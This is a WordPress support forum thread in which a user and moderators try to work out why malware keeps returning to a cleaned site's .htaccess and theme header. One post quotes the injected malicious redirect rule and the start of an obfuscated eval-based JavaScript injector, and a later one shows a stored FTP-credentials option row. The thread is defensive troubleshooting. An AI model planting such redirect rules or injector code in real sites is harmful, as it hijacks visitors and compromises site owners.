WordPress.org

Ready to get started?Download WordPress

Forums

Malware in DB - how to identify (18 posts)

  1. ThorHammer
    Member
    Posted 1 year ago #

    After cleaning my site entirely and changing db-user and its password to 50 random chars, as well as the ONLY account, admin, to another 50 random chars, deleting the entire old installation and all plugins and the theme as well, and of course new salt-code and then reinstalling everything fresh AND adding very, very strict .htaccess-files in ALL folders and root - the fu***ng malwarecode again appeared in my root htaccess and in the themes header code. This must mean that something must be stored somewhere in my DB, of course encoded, but how on earth am I supposed to find this shit and kill it once for all??
    I am willing to crawl into every single row in order to get rid of this pest, but I really do not kinow what I am looking after.
    Any ideas?

  2. esmi
    Theme Diva & Forum Moderator
    Posted 1 year ago #

    The back door might not be in the database but hidden in your uploads folder. See http://ottopress.com/2009/hacked-wordpress-backdoors/

  3. ThorHammer
    Member
    Posted 1 year ago #

    Thanks for your reply. Sadly, my upload dir is clean as water. All years. Each month... I have checked everything. It has to be something in the database.

  4. esmi
    Theme Diva & Forum Moderator
    Posted 1 year ago #

    Have you spoken to your hosts? This could be a server security issue - not a WP one - especially since the root .htaccess was targeted.

  5. ThorHammer
    Member
    Posted 1 year ago #

    Yes, I have spoken to them, but they are not willing to take any responsibility.
    By the way, the code inserted into my .htaccess and my themes header are easy to find, it always start with: #336988# with the code between and ends with a trailing slash.
    In htaccess this entry is cleared: RewriteRule ^(.*)$ http://digitalphoto-art.it/traf.php [R=301,L]

    The malware code in the header template is a php ecoing a javascript which starts like this: dbshre=220;try{window.document.body*=2}catch(gdsgsdg){if(dbshre){zaq=0;try{v=document.createElement(\"div\");}catch(agdsg){zaq=1;}if(!zaq){e=eval;}ss=String;asgq=new Array(31,94,11 etc etc.

  6. esmi
    Theme Diva & Forum Moderator
    Posted 1 year ago #

    I have spoken to them, but they are not willing to take any responsibility.

    Time to change hosts, perhaps? Have you changed all of your ftp and hosting account management passwords in case you had an ftp leak?

    From what you describe above, I can't see how anything in the database could be responsible for this. It really does smack of a compromised server but just to be on the safe side, so you have any pre-hack database backups?

  7. ThorHammer
    Member
    Posted 1 year ago #

    Yes, I do have an old DB backup, but I miss of course some entries in it. And yes, I have changed all passwords - everything.

  8. ThorHammer
    Member
    Posted 1 year ago #

    After googling myself to death I have found somthing that might be a very, very odd row in my OPTIONS table:

    SELECT *
    FROM <code>my_damn_database</code>.<code>my_damn_database_options</code>
    WHERE (
    CONVERT( <code>option_id</code>
    USING utf8 ) LIKE 'ftp_credentials'
    OR CONVERT( <code>option_name</code>
    USING utf8 ) LIKE 'ftp_credentials'
    OR CONVERT( <code>option_value</code>
    USING utf8 ) LIKE 'ftp_credentials'
    OR CONVERT( <code>autoload</code>
    USING utf8 ) LIKE 'ftp_credentials'
    )
    LIMIT 0 , 30

    Should I delete this row? Now?

  9. ThorHammer
    Member
    Posted 1 year ago #

    The information wordpress need in order to update plugins, themes and core are stored in the wp-config. The information I found in my DB (Options-table) (the row with ftp_credentials) is actually the complete information needed to get full ftp access to my server...! This cannot be a standard wordpress insert?

  10. This cannot be a standard wordpress insert?

    I've never looked myself as FTP is a horrible protocol for me but if you can setup a second instance of WordPress with a separate table prefix (so you don't use the old installation) you can easily check.

  11. esmi
    Theme Diva & Forum Moderator
    Posted 1 year ago #

    Can I just clarify that this was an option called ftp_credentials in the wp_option table? Just checked a couple of my sites & there's nothing like this in the databases.

  12. ThorHammer
    Member
    Posted 1 year ago #

    Yes, Esmi. In the OPTIONS table I have a row with option_name: ftp_credentials

    The value is (almost - but it is straight forward the real ftp address and the real ftp login name and yes, it is marked autoload YES):
    a:3:{s:8:"hostname";s:14:"webnumber51.theserver.com";s:8:"username";s:5:"the-real-username";s:15:"connection_type";s:3:"ftp";}

  13. esmi
    Theme Diva & Forum Moderator
    Posted 1 year ago #

    I wonder if this came from a plugin? It's definitely not in any of the the databases that I've looked at.

    [EDIT: I've asked for some more eyes on this.]

  14. ThorHammer
    Member
    Posted 1 year ago #

    Yes...because, it might be easy just to query the db and get this very, very important information...

  15. Jose Conti
    Member
    Posted 1 year ago #

    Do you use filezilla client?

    That ftp client store without encriptiom all data so if you have a Trojan in you PC, someone can access all your username, password and website.

  16. ThorHammer
    Member
    Posted 1 year ago #

    No, José, I am using another FTP client, and yes, I have recently found a trojan on my PC and killed it. I have not checked if this client stores the login information un-encrypted as Filezilla does (as a very visible text file).
    But still: The table row I found in my options really do look suspicious.

  17. esmi
    Theme Diva & Forum Moderator
    Posted 1 year ago #

    Right now, we think this is part of your hack rather than anything added by WordPress itself. That said, it's not possible to rule this being added by a poorly-designed plugin. Or even a theme (I've seen some themes that require FTP access).

  18. ThorHammer
    Member
    Posted 1 year ago #

    And I have just emptied and dropped this row. Everything works as it should.
    It will be very interesting to see if this has any effect, among all the other things I have done, to prevent further malicious code injections.

Topic Closed

This topic has been closed to new replies.

About this Topic